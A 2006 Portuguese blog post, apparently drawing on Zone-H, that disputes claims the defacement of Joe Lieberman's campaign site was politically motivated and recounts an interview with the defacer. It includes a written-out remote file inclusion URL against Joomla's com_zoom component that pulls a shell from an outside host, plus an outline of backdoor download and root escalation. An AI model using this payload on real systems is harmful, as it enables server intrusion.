Site da campanha de Lieberman atacado por motivos políticos!? O outro lado da história por Zone-H

11/08/2006 Written by Marcelo Almeida (Vympel)

joe_liberman O site da cam­panha do Senador amer­i­cano Joe Lieber­man foi recen­te­mente alve­jado por crack­ers, e no mín­imo 3 vezes, como infor­mou seu asses­sor.

Em dois casos o site do Senador sofreu deface (você pode ver­i­ficar a mir­ror aqui), e segunda uma infor­mação recente, ele estava sofrendo um ataque de negação de serviço (DDoS). No site do Senador tem a men­sagem que esta sendo “ata­cado por seus opos­i­tores políti­cos”.
Ele até mesmo ques­tio­nou se seu opo­nente Ned Lam­ont “achava justo fazer este tipo de jogo sujo e ataques desqual­i­fi­ca­dos desta maneira e por que não par­ava e desis­tia destas ati­tudes”.

Mas será ver­dade?
Zone-​H tem pelo menos uma coisa a dizer, pelo menos na parte da invasão…
 

Ver­i­f­i­cando rap­i­da­mente no site do net­craft podemos ver que o site esta rodando Linux com Apache/1.3.36 (sem ficar offline desde dia 16 do mês pas­sado deixando dúvi­das sobre o ataque de DDoS…) e uma busca ráp­ida no cache google podemos ver que o site usa Joomla! (nós tam­bém usamos… mas um pouco mod­i­fi­cado) com um com­po­nent com_​zoom usado para visu­al­iza­ção de vários tipos de mídias, que tem uma falha de remote include.
Exem­plo do fun­ciona­mento da falha:
http://target/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://exploitsite/shell.gif?&cmd=ls
Com este comando um ataque irá o comando LS do linux den­tro do site que estiver rodando esta ver­são vul­nerável retor­nando a listagem das pas­tas no diretório do site.
Com este tipo de falha um inva­sor pode exe­cu­tar qual­quer tipo de comando que o servi­dor estiver con­fig­u­rando para per­mi­tir inclu­sive wget, lynx, curl etc… e fazer o down­load de um back­door que abre u ma porta para o cracker pen­e­trar no servi­dor. Uma vez den­tro do servi­dor o cracker usou para obter acesso root o novo exploit RAP­TOR PCRTL para kernel’s 2.6.* (con­forme relato do defacer, esta era a ver­são do ker­nel no servi­dor).

Quando entramos em con­tato com o defacer, tam­bém per­gun­ta­mos se foi motivos políti­cos rela­ciona­dos à guerra no Líbano (pois o mesmo é da Turquia e pode­ria esta apoiando na quan­ti­dade enorme de ataques que estão sendo feitas diari­a­mente com protestos con­tra a guerra) que levaram ao ataque, e ele respon­deu: “Não, foi só por diver­são”.
Per­gun­ta­mos para ele tam­bém se estava dando ataque de DdoS no site do Senador ou se sabia de alguém que o estava fazendo ele respon­deu que não e que con­tin­uou aces­sando o servi­dor desde o dia da invasão, e como hoje, sem­pre esteve on-​line deixando mais dúvi­das sobre a história de DDoS tam­bém.

Pelas respostas do cracker podemos ter a certeza que o ataque foi sem nen­hum intenção de inter­ferir na cam­panha do Senador e que depois de fazer a invasão foi atacar out­ros sites “só por diver­são”


Share this content: